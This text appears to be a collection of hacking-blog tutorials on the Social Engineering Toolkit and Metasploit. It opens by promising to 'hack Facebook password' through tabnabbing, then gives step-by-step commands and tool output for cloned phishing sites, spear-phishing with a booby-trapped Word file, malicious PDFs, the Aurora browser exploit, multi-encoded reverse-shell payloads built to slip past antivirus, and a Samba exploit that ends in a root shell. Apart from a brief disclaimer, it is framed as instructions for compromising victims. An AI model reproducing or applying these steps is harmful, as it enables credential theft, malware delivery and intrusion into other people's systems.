Tab nabbing With SET(Social Engineering Toolkit )

In this tutorial I will show you how to hack Facebook password with tab nabbing using SET.

Tab nabbing is a computer based exploit or it is also called Phishing  attack. The attack takes advantage of user trust and inattention to detail in regard to tabs, and the ability of modern web pages to rewrite tabs and their contents a long time after the page is loaded.  In a tabnabbing scenario, a target is caught while  accessing a website with multiple tabs open. When the target clicks a link, he is presented with a “Please wait while the page loads” message. When the target switches tabs, the website detects that a different
tab has focus and rewrites the web page that presented the “Please wait . . . ” message with a website you specify. Eventually, the target clicks the tabnabbed tab, and, believing he is being asked to sign in to his email program or business  application, he enters his credentials into the malicious look-alike site. The credentials are harvested, and the target is redirected  to the original website. Tab nabbing operates in reverse of most phishing attacks in that it doesn’t ask users to click on an obfuscated link but instead  loads a fake page in one of the open tabs in your browse

First thing we have to do of course is to open the Social Engineering Toolkit and to choose the Website Attack Vectors option :

                           

Next we will see the available attacks that we can use.Of course our choice here is option number 4 and the Tab nabbing Attack Method

          

 

In the next menu we will choose option number 2 in order to clone the Website of our preference

    

Now enter your IP address

Now it is time to choose the website that the SET will clone.In this scenario our choice will be the Facebook.
                            

 If we send a link with our IP address to our victim and he opens it he will notice that a new tab will open and a message will
appear saying "Please wait while the page loads":

            

Note : You can also use tinyurl to hide the ip address of attacker…. Or there is also so many method available to request the victim to open the url..

Then after the Fake website will load and we just have to wait to enter his credentials in order to capture them.

The next image is showing what we will see in SET when the victim inserts his credentials into the username and password fields.

Watch Video Tutorial HERE.

Web Attack Vectors with Java Applet !

The Java applet attack is one of the most successful attack vectors in SET and has the highest success rate for compromise system. Popular because we can create the infected Java applet very easily,we can clone any site we want that will load the applet very fast and successful because it affects all the platforms.The only difficulty is how to deliver the Java Applet properly in order to trick our victims.
The Java Applet attack will create a malicious Java Applet that once run, will completely compromise the victim. The neat trick with SET is that you can completely clone a website and once the victim has clicked run, it will redirect the victim back to the original site making the attack much more believable.

The Java applet Attack vector affects:

    Windows Systems
    Linux Systems and
    Mac OS X
We are opening the Social Engineering Toolkit and we choose the option Website Attack Vector.
                  

you need to select 2 and then press enter:

In the next menu we will choose the first option the Java Applet Attack Method:
                                                    

In the next section, we will see there are three options:
                                 

The option site cloner would be used in order to recreate the website of our choice that will carry the malicious Java applet.

Now in the next menu, it will ask are you using NAT ?
Set yes if you use !
                                             
Enter the URL of your choice and click enter. Here i am using www.hacxorprogramming.blogspot.in  but you can use any  website you feel comfortable that can trick the users to run the Java Applet.

The next part is to decide which payload it will be used.There is a variety of available payloads that SET provides but here we have chosen to use a simple Windows Shell Reverse TCP :
                          

                                               
You have now succesfully cloned a website, but you're not done. Now you need to bypass anti virus software for this to actually  work. we have chosen the Backdoored Executable which is the best choice there:

The next option has to do with the port of the listener.You can press enter in order the SET to choose the default port which is 443.
     
Our next step now is to try to find a way to mask our IP address in order to have a domain that will look original.We can register a domain or we can use any of the online shorten URL services to hide our IP when we will send the link to our target.

Note : If you had changed the configuration file to include WEBATTACK_EMAIL=ON, you
would have been prompted to send an email using the spear-phishing attack vector
(minus attachments).

Now that everything is set up, you simply need to get a target to browse to the malicious site. Upon reaching the website, the target sees a pop-up warning from the publisher. If the target clicks Run, and most users will, the payload will be executed, and  you gain full control of the user’s system.


Now it’s up to you to convince your victim to click on the link but once they do they will be brought to your cloned website and an  “accept certificate” window will pop up. If they click on it and Back at our attacker machine, the Meterpreter session is successfully established,

Social Engineer Toolkit (SET) tutorial for penetration testers!

Social engineering is the act of getting people to give you the information you seek, usually by gaining their trust. That trust may be gained by posing as someone in authority, a colleague, or just someone who needs help. The purpose of SET is to fill a gap in the penetration testing community and bring awareness to social-engineering attacks. The  toolkit attacks human weaknesses, exploiting curiosity, credibility, avarice, and simple human stupidity. Socialengineering attacks are at an all-time high and have always been a large risk for many organizations.
The current version of the Social Engineering Toolkit includes the following types of attacks.
 
Spearphishing
Websites
Infectious Media Generator
SMS spoofing Attack vector

Spear-Phishing Attack Vector :
The spear-phishing attack vector specially crafts file-format exploits (such as Adobe PDF exploits) and primarily sends email attacks containing attachments to a target, which, when opened, compromise the target’s machine. A spear-phishing attack is similar, except that it targets one or a few individuals. In other words, it’s a targeted social engineering attack, hence the spear.

Let’s now select number 1 from the menu and begin our spear-phishing attack.
It explains what a spear-phishing attack is and asks us how we want to go about our attack. We can choose:

 set> 1

 The Spearphishing module allows you to specially craft email messages and send
 them to a large (or small) number of people with attached fileformat malicious
 payloads. If you want to spoof your email address, be sure "Sendmail" is in-
 stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF
 flag to SENDMAIL=ON.

 There are two options, one is getting your feet wet and letting SET do
 everything for you (option 1), the second is to create your own FileFormat
 payload and use it in your own attack. Either way, good luck and enjoy!

   1) Perform a Mass Email Attack
   2) Create a FileFormat Payload
   3) Create a Social-Engineering Template
  99) Return to Main Menu

Let’s select a FileFormat attack. Type number 2 and press enter.

set:phishing>2

 Select the file format exploit you want.
 The default is the PDF embedded EXE.

           ********** PAYLOADS **********

   1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
   2) SET Custom Written Document UNC LM SMB Capture Attack
   3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
   4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
   5) Adobe Flash Player "Button" Remote Code Execution
   6) Adobe CoolType SING Table "uniqueName" Overflow
   7) Adobe Flash Player "newfunction" Invalid Pointer Use
   8) Adobe Collab.collectEmailInfo Buffer Overflow
   9) Adobe Collab.getIcon Buffer Overflow
  10) Adobe JBIG2Decode Memory Corruption Exploit
  11) Adobe PDF Embedded EXE Social Engineering
  12) Adobe util.printf() Buffer Overflow
  13) Custom EXE to VBA (sent via RAR) (RAR required)
  14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
  15) Adobe PDF Embedded EXE Social Engineering (NOJS)
  16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
  17) Apple QuickTime PICT PnSize Buffer Overflow
  18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
  19) Adobe Reader u3D Memory Corruption Vulnerability
  20) MSCOMCTL ActiveX Buffer Overflow (ms12-027)


After we select our FileFormat type attack, we will be asked what type of exploit we would like to use. Notice that the default is the
PDF with the embedded .exe. In this hack, let’s use the Microsoft Word RTF Fragments attack (or MS10_087)

set:payloads>4



   1) Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker
   2) Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker
   4) Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
   5) Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
   6) Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system
   7) Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter


This will create a Word document that will overflow a buffer and enable us to put a listener or rootkit on the victim’s machine. Type
4 and press enter.
Now that we have decided what type of file we want to use in our attack, our next step is to decide what type of listener we want to
leave on the victim system.
we type number 5 and press enter.
Now enter the IP address for payload listener and press enter.

If we want to trick the victim into opening the file, we should name it something that sounds enticing or familiar to the victim.
Now this will differ depending upon the victim, but in our scenario we’re trying to spear a manager at a large company, so let’s  call it SalesReport, something he or she might actually be expecting in their email.

set:payloads>5
set> IP address for the payload listener: 192.168.121.128
set:payloads> Port to connect back on [443]:
[-] Defaulting to port 443...
[-] Generating fileformat exploit...
[*] Payload creation complete.
[*] All payloads get sent to the /root/.set/template.rtf directory
[-] As an added bonus, use the file-format creator in SET to create your attachment.

   Right now the attachment will be imported with filename of 'template.whatever'

   Do you want to rename the file?

   example Enter the new filename: moo.pdf

    1. Keep the filename, I don't care.
    2. Rename the file, I want to be cool.

Now that we have created the malicious file, we now need to create the email. This is important. If we’re to get the victim to open the file, the email must look legitimate. SET prompts us whether we want to use a pre-defined template or a one-time-use email template. Let’s be creative and choose a one-time-use email

set:phishing>2
set:phishing> New filename:SalesReport
[*] Filename changed, moving on...
   Social Engineer Toolkit Mass E-Mailer

   There are two options on the mass e-mailer, the first would
   be to send an email to one individual person. The second option
   will allow you to import a list and send it to as many people as
   you want within that list.

   What do you want to do:

   1.  E-Mail Attack Single Email Address
   2.  E-Mail Attack Mass Mailer

   99. Return to main menu.
  
set:phishing>1

   Do you want to use a predefined template or craft
   a one time email template.

   1. Pre-Defined Template
   2. One-Time Use Email Template

set:phishing>2
set:phishing> Subject of the email:Report
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:p
set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:This is report on sales. If you have any question, please feel free to ask
Next line of the body:
Next line of the body: Sincerely
Next line of the body:
Next line of the body: Your Rohit
Next line of the body: ^Cset:phishing> Send email to:victim'sEmailAdress@Here                      

  1. Use a gmail Account for your email attack.
  2. Use your own server or open relay

set:phishing>1
set:phishing> Your gmail email address:EnterYourEmail@Here
set:phishing> The FROM NAME user will see: :Rohit
Email password:
set:phishing> Flag this message/s as high priority? [yes|no]:y
Finally, create a Metasploit listener for the payload to connect back to. When SET launches Metasploit, it configures all the necessary options and starts to listen on your attacking IP address on port 443

File Format Exploit !

File format bugs are exploitable vulnerabilities found within a given application, such as an Adobe PDF document. This class of exploit relies on a user actually opening a malicious file in a vulnerable application. Malicious files can be hosted remotely or sent via email.
In this tutorial I will give a demonstration how to attack client side using Adobe PDF Escape EXE vulnerability. Almost 95%(maybe)  Windows users have Adobe Acrobat (Acrobat Reader) application in their computer or laptops.

Here the first step is create a malicious PDF to use in this attack by using vulnerability in Adobe Reader .

msf >use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
msf >set payload windows/meterpreter/reverse_tcp
msf >set filename Important_Meeting_Notice.pdf
msf >set lhost 192.168.8.92
msf >set lport 443
msf > exploit

The next step is sending our malicious code to target e-mail. send it to your victim's.

After sending our malicious PDF files, we need to set up a listener to capture this reverse connection. We will use msfconsole to set up our multi handler listener. This will ensure that when the exploit is triggered, the attacker machine can receive the connection back from the target machine (reverse payload).

msf exploit(adobe_pdf_embedded_exe_nojs ) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.8.92
LHOST => 192.168.8.92
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.8.92 :443
[*] Starting the payload handler...
msf exploit(handler) >

After the victim open our malicious PDF file there's an alert box guide victim to tick the "do not show this message again" and
click open. After the victim click open button, our listener start capture reverse connection.

We have successfully exploited a file format vulnerability by creating a malicious document through Metasploit and then sending it to our targeted user.
As a penetration tester, every bit of information can be used to craft an even better attack. Browser exploits and file format exploits are typically very effective, granted you do your homework.

An introduction to Client-side exploits !

Note : This tutorial is made for educational purposes only to help you understand how the exploit's can be exploited.

Client-side vulnerabilities are vulnerabilities in client software such as web browsers,
e-mail applications, and media players. Client side exploits are an extremely common form of attack. A typical scenario is an attacker compromises an ecommerce website and then use that website as a proxy to launch attacks on unsuspecting website visitors. Client-side vulnerabilities are especially effective in spear phishing attacks because an attacker can easily choose a set of “targets” (people) and deliver a lure to them via e-mail without knowing anything about their target network configuration. Attackers build sophisticated, convincing e-mails that appear to be from a trusted associate. Victims click on a link in the e-mail and end up at evil.com with the attacker serving up malicious web content from an attack web server to the victim’s workstation. Client-side attacks were the next evolution of attacks after network defenses became more prominent. These attacks target software commonly installed on computers in such programs as web browsers, PDF readers, and Microsoft Office applications. Because these programs are commonly installed on computers out of the box, they are obvious attack vectors for hackers. How many of us have received viruses from a malicious webpage and website? More  often than not, the owner of the website does not know that the website contains malicious code that is attacking its visitors. In these scenarios the target of the exploit is the user's web browser. 
for example, that you are performing a covert penetration test against a corporate target using social engineering. You decide that sending a phishing email to targeted users will present your best chance of success. You harvest email accounts, names, and phone numbers; browse social-networking sites; and create a list of known employees. Your malicious email instructs the email recipients that payroll information needs to be updated; they need to click a link (a malicious link) in the email to do this. However,as soon as the user clicks the link, the machine is compromised, and you can access the organization’s internal network.If an attacker wants to attack your firewall-protected computer, he will normally be blocked by your firewall. However, if the attacker instead hosts the domain evil.com and entices you to browse to www.evil.com, he now has a communication channel to interact with your computer. He needs to find a vulnerability either in the browser or in a component
that the browser uses to display web content. If the attacker finds such a vulnerability, the firewall is no longer relevant.

Metasploit has many uses and another one we will discuss here is client side expoits. To show the power of how MSF can be used in client side exploitss we will see here.

Exploring the Internet Explorer Aurora Exploit :
The browser exploit of choice here is the Aurora exploit (Microsoft Security Bulletin MS10-002). Aurora was most notoriously used in the attacks against Google and more than 20 other large technology companies. This vulnerability was important for both historical and technical reasons. Although this exploit was released in early 2010, it particularly resonates with us because it took down some major players in the technology industry. It was the first time that a client-side browser based attack had gained such notoriety.


Open msfconsole and We’ll start by using the Aurora Metasploit module and then set our payload.

msf > use exploit/windows/browser/ms10_002_aurora
  
msf exploit(ms10_002_aurora) >

msf exploit(ms10_002_aurora) > show options
  
  Module options (exploit/windows/browser/ms10_002_aurora):
  
     Name        Current Setting  Required  Description
     ----        ---------------  --------  -----------
     SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or

0.0.0.0
     SRVPORT     8080             yes       The local port to listen on.
     SSL         false            no        Negotiate SSL for incoming connections
     SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
     URIPATH                      no        The URI to use for this exploit (default is random)
  
  
  Exploit target:
  
     Id  Name
     --  ----
     0   Automatic
msf exploit(ms10_002_aurora) > set SRVHOST 127.0.0.1
 SRVHOST => 127.0.0.1
 msf exploit(ms10_002_aurora) > set SRVPORT 80
 SRVPORT => 80
 msf exploit(ms10_002_aurora) > set URIPATH /
 URIPATH => /
 msf exploit(ms10_002_aurora) >

First, notice that the default setting for SRVHOST  is 0.0.0.0: This means that the web server will bind to all interfaces. The SRVPORT at , 8080, is the port to which the targeted user needs to connect for the exploit to trigger. We will be using port 80
instead of 8080. Above we set the Server to localhost i.e 127.0.0.1 , Server port to 80 and the URI path to ‘/’ (ROOT).

Now let’s Set Payload :-

msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
  PAYLOAD => windows/meterpreter/reverse_tcp
  msf exploit(ms10_002_aurora) > show options
  
  Module options (exploit/windows/browser/ms10_002_aurora):
  
     Name        Current Setting  Required  Description
     ----        ---------------  --------  -----------
     SRVHOST     127.0.0.1        yes       The local host to listen on. This must be an address on the local machine or

0.0.0.0
     SRVPORT     80               yes       The local port to listen on.
     SSL         false            no        Negotiate SSL for incoming connections
     SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
     URIPATH     /                no        The URI to use for this exploit (default is random)
  
  
  Payload options (windows/meterpreter/reverse_tcp):
  
     Name      Current Setting  Required  Description
     ----      ---------------  --------  -----------
     EXITFUNC  process          yes       Exit technique: seh, thread, process, none
     LHOST                      yes       The listen address
     LPORT     4444             yes       The listen port
  
  
  Exploit target:
  
     Id  Name
     --  ----
     0   Automatic
  
  
  msf exploit(ms10_002_aurora) > set LHOST 127.0.0.1
  LHOST => 127.0.0.1
  msf exploit(ms10_002_aurora) > set LPORT 31337
  LPORT => 31337
  msf exploit(ms10_002_aurora) >

we set the Payload to reverse_tcp , the listening server to localhost and the listening Port to 31337.

Now that all is setup, let’s launch the exploit :

msf exploit(ms10_002_aurora) > exploit
 
Exploit running as background job.
Started reverse handler on 127.0.0.1:31337
Using URL: http://127.0.0.1:80/
Server started.

The malicious web page is sitting on our server (URL: http://127.0.0.1:80/) , Now all you have to do is direct victim to this webpage and if they are running an exploitable version on Windows XP they’ll get owned!

How to bypass antivirus detection !

In the previous articles, we have seen how to create a simple backdoor for exploiting windows machines simple backdoor.
The goal of your penetration test might be to test detection mechanisms in your organization, such as the intrusion detection
systems (IDS) or intrusion prevention systems (IPS). When you are performing a penetration test, nothing is more embarrassing
than being caught by antivirus software. How did your detection mechanisms respond to stealthy attacks? What did they catch
and, more importantly, what did they miss? If the attacker was successful, how is she hiding her presence on your organization’s
hosts?

One of the best ways to avoid being stopped by antivirus software is to encode our payload with msfencode. A common
misconception is that the antivirus engines are actually detecting the shellcode, and therefore, the best way to avoid antivirus
detection is to pick an encoder that the antivirus engine cannot handle, or encode many times. After all, those are both
prominent options of msfencode.

First of all, we’ll run a simple encoding of an MSF payload by importing raw output from msfpayload into msfencode to see how
the result affects our antivirus detection:

root@kali:/# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.132 LPORT=1337 R | msfencode -e x86/shikata_ga_nai  -t
exe  > /var/www/payload.exe
[*] x86/shikata_ga_nai succeeded with size 342 (iteration=1)

When you test our payload with antivirus , we see that it’s detected.

Multi-encoding :
In the preceding example, the shikata_ga_nai encoding is polymorphic, meaning that the payload will change each time the
script is run. Of course, the payload that an antivirus product will flag is a mystery: Every time you generate a payload, the same
antivirus program can flag it once and miss it another time.

root@kali:/# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai
-c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown
-c 5 -t exe -o /var/www/payload3.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
[*] x86/alpha_upper succeeded with size 921 (iteration=1)
[*] x86/alpha_upper succeeded with size 1911 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1940 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 1969 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1998 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2027 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2056 (iteration=5)
[*] x86/countdown succeeded with size 2074 (iteration=1)
[*] x86/countdown succeeded with size 2092 (iteration=2)
[*] x86/countdown succeeded with size 2110 (iteration=3)
[*] x86/countdown succeeded with size 2128 (iteration=4)
[*] x86/countdown succeeded with size 2146 (iteration=5)

Here we use five counts at .. of shikata_ga_nai, feeding the code in raw format at .. into two counts of alpha_upper encoding.

This Time when you scan with antivirus, You can see we have successfully slipped our payload past the antivirus engine.

How to Exploiting an Ubuntu Machine!

In my previous tutorial, i was explaining  how to exploit an window
machine. So here we will Exploit an Ubuntu Machine.

The steps are
pretty much the same as for the preceding exploit except that we will
select a different payload.


msf > nmap -sT -A -P0 192.168.1.3


Assume we get three open ports: 80, 139, 445 and  running a version of
Samba 3.x and Apache 2.2.3 with PHP 5.2.1.


Let’s search for a Samba exploit :

msf > search samba
[*] Searching loaded modules for pattern 'samba'...
Auxiliary
=========
Name Rank Description
---- ---- -----------
admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal
dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow
dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow
Exploits
========
Name Rank Description
---- ---- -----------
linux/samba/lsa_transnames_heap good Samba lsa_io_trans_names . . .
. . . SNIP . . .
msf > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > show payloads
Compatible Payloads
===================
Name Rank Description
---- ---- -----------
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
linux/x86/adduser normal Linux Add User
linux/x86/chmod normal Linux Chmod
linux/x86/exec normal Linux Execute Command
linux/x86/metsvc_bind_tcp normal Linux Meterpreter Service, Bind TCP
linux/x86/metsvc_reverse_tcp normal Linux Meterpreter Service, Reverse TCP Inline
linux/x86/shell/bind_ipv6_tcp normal Linux Command Shell, Bind TCP Stager (IPv6)
linux/x86/shell/bind_tcp normal Linux Command Shell, Bind TCP Stager
. . . SNIP . . .
msf exploit(lsa_transnames_heap) > set payload linux/x86/shell_bind_tcp
payload => linux/x86/shell_bind_tcp
msf exploit(lsa_transnames_heap) > set LPORT 8080
LPORT => 8080
msf exploit(lsa_transnames_heap) > set RHOST 192.168.1.2
RHOST => 192.168.1.2
msf exploit(lsa_transnames_heap) > exploit
[*] Creating nop sled....
[*] Started bind handler
[*] Trying to exploit Samba with address 0xffff104e...
[*] Connecting to the SMB service...
. . . SNIP . . .
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 1 opened (192.168.1.3:41551 -> 192.168.1.2:8080)

whoami
root
This type of exploit, called a heap-based attack, takes advantage of
dynamic memory allocation.